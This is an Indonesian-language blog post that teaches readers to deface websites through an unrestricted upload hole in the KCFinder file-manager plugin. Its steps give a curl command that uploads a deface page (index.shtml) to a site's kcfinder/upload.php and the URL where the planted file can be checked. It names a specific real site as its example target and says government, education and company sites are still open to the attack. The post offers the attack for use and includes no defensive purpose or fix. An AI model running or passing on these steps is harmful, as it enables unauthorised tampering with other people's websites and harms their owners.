Kcfinder Upload Script Deface Di Terminal Dengan Curl

Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan kini lagi pengen banget ngepost artikel di blog tapi masalahnya gua galau mau nulis apa, dan datang tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.

Apa itu Kcfinder?

KCFinder ialah salah satu plugin terkenal untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa dipakai oleh para web master. Celah keamanan ini bahkan hingga di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update informasi banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, forum pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.

Apa itu cURL?

cURL ialah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data memakai banyak sekali protokol.

Silahkan baca juga jikalau ingin lebih tau Upload File dengan cURL di Terminal.

Oke pribadi aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu materi yang diperlukan,

Bahan :

Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
Terminal / CMD

Tested :

MAC OS X Yosemite

Step :

Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini sasaran aku sudah ada menyerupai berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ sehabis /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.